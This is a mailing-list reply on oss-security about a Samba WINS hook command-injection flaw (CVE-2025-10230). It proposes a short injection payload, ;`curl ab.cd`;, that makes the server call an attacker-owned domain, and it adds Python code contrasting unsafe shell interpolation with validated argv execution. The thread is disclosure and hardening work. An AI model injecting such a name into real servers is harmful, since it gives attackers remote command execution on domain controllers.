-----Original Message-----
From: Douglas Bagnall <[email protected]>
Sent: Wednesday, October 15, 2025 11:51 AM
To: [email protected]
Subject: [oss-security] Samba security releases for CVE-2025-10230 and CVE-2025-9640

> [snip]
> If a Samba server has WINS support enabled (it is off by default), and it has
> a 'wins hook' parameter specified, the
> program specified by that parameter will be run whenever a WINS name is
> changed.
> The WINS server used by the Samba Active Directory Domain Controller did not
> validate the names passed to the wins
> hook program, and it passed them by inserting them into a string run by a
> shell.
> WINS is an obsolete and trusting protocol, and clients can request any name
> that fits within the 15 character NetBIOS
> limit. This includes some shell metacharacters, making it possible to run
> arbitrary commands on the host.
> The WINS server used by Samba when it is not a domain controller is
> unaffected.

Illegal characters in a NetBIOS hostname are: \ / : * ? " < > | , notably excluding backticks and semicolons.

I'm not deeply familiar with the Samba code base, but a glance at nbtname.c and winsserver.c seems to suggest that those character limitations aren't enforced at the protocol level, so it might be possible to use pipes, redirects or exec a local binary with a short path.

Otherwise, the easiest exploitable payload I can think of would be:

    ;`curl ab.cd`;

which fits the restrictions at only 14 characters (replace with your favourite short-named download tool that writes to STDOUT by default - looks like RHEL-likes are one of the few distros still shipping /usr/bin/GET as part of perl LWP).

Requiring an attacker to own a 2-3 letter domain on a 2-3 letter TLD limits the attack surface quite a bit, but it isn't unheard of.

I'd be interested to see if anybody has a living Samba install configured as a DC with WINS still running in 2025.
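The defect the advisory describes is a classic one: an attacker-controlled string (the NetBIOS name) interpolated into a command line that is then handed to a shell. The following Python is an added illustration written for this thread, not Samba code, showing that vulnerable pattern beside the hardened form a hook wrapper should use: validate the name against the 15-character limit, the illegal NetBIOS characters listed above and shell metacharacters, then pass it as a single argv element with no shell involved. The hook argument layout (operation, name, TTL, addresses), the strict `[A-Za-z0-9_-]` allow-list and the sample names are assumptions made for the example.

```python
import re
import subprocess
from typing import Optional, Sequence

# Maximum length of a NetBIOS name, as stated in the advisory.
NETBIOS_MAX_LEN = 15

# Characters the thread lists as illegal in a NetBIOS hostname.
NETBIOS_ILLEGAL = set('\\/:*?"<>|,')

# Characters that carry meaning for a POSIX shell. A name containing any of
# these must never reach a shell-interpreted command string.
SHELL_META = set(";&|`$(){}<>*?[]!#~'\"\\") | {"\n", " ", "\t"}

# Strict allow-list used by the hardened path below. This is a policy choice
# made for this example; it is tighter than what NetBIOS itself permits.
ALLOWED_NAME = re.compile(r"^[A-Za-z0-9_-]{1,15}$")


def check_netbios_name(name: str) -> Optional[str]:
    """Return None if the name is acceptable, else a short reason for rejection."""
    if not name:
        return "empty name"
    if len(name) > NETBIOS_MAX_LEN:
        return f"longer than {NETBIOS_MAX_LEN} characters"
    bad = sorted(set(name) & NETBIOS_ILLEGAL)
    if bad:
        return "illegal NetBIOS characters: " + "".join(bad)
    meta = sorted(set(name) & SHELL_META)
    if meta:
        return "shell metacharacters: " + "".join(meta)
    if not ALLOWED_NAME.fullmatch(name):
        return "outside allow-list [A-Za-z0-9_-]"
    return None


def build_hook_command_unsafe(hook: str, op: str, name: str, ttl: int,
                              addrs: Sequence[str]) -> str:
    """The pattern the advisory describes: the name is interpolated into one
    string that is later given to /bin/sh, so any metacharacter in `name`
    becomes shell syntax. Kept here only for contrast; never executed."""
    return f"{hook} {op} {name} {ttl} {' '.join(addrs)}"


def build_hook_argv(hook: str, op: str, name: str, ttl: int,
                    addrs: Sequence[str]) -> list:
    """Hardened form: validate first, then carry the name as its own argv
    element so no shell ever parses it. Argument order is an assumption."""
    reason = check_netbios_name(name)
    if reason is not None:
        raise ValueError(f"refusing to run wins hook for {name!r}: {reason}")
    return [hook, op, name, str(ttl), *addrs]


def run_hook(argv: Sequence[str]) -> int:
    """Execute the hook directly (shell=False), returning its exit status."""
    return subprocess.run(list(argv), shell=False, check=False).returncode


if __name__ == "__main__":
    import shutil
    # Constructed demo: use echo as a stand-in hook so the run is harmless.
    echo = shutil.which("echo") or "/bin/echo"
    for sample in ("FILESERVER01", "A;B"):
        try:
            argv = build_hook_argv(echo, "add", sample, 3600, ["192.0.2.10"])
            print("running:", argv)
            run_hook(argv)
        except ValueError as err:
            print(err)
```

With the unsafe builder, a name such as `A;B` yields a command line in which `;` is a statement separator; with the argv builder the same input is rejected before anything runs, and a valid name reaches the hook as one literal argument regardless of what it contains.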
